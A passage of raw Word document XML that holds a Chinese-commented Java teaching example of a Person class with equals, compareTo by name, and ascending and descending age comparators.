          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>            return age;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        }</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        public String toString() {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>            return name + " - " +age;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        }</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>        /**</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">         * </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>比较两个</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>是否相等：若它们的</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>都相等，则认为它们相等</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>         */</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        boolean equals(Person person) {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>            if (this.age == person.age &amp;&amp; this.name == person.name)</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>                return true;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>            return false;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        }</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        /**</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">         * @desc </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> “Comparable&lt;String&gt;” </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的接口，即重写</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>compareTo&lt;T t&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">         *  </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>这里是通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的名字</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>进行比较的</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>         */</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        @Override</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        public int compareTo(Person person) {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>            return name.compareTo(person.name);</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>            //return this.name - person.name;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        }</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    }</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    /**</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>     * @desc AscAgeComparator</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>比较器</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">     *       </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>它是</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的升序比较器</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>     */</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    private static class AscAgeComparator implements Comparator&lt;Person&gt; {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        @Override</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        public int compare(Person p1, Person p2) {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>            return p1.getAge() - p2.getAge();</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        }</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    }</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    /**</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>     * @desc DescAgeComparator</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>比较器</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">     *       </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>它是</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的升序比较器</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>     */</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    private static class DescAgeComparator implements Comparator&lt;Person&gt; {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        @Override</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        public int compare(Person p1, Person p2) {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>            return p2.getAge() - p1.getAge();</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        }</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    }</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008227AA" w:rsidRPr="008227AA" w:rsidRDefault="008227AA" w:rsidP="008227AA">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
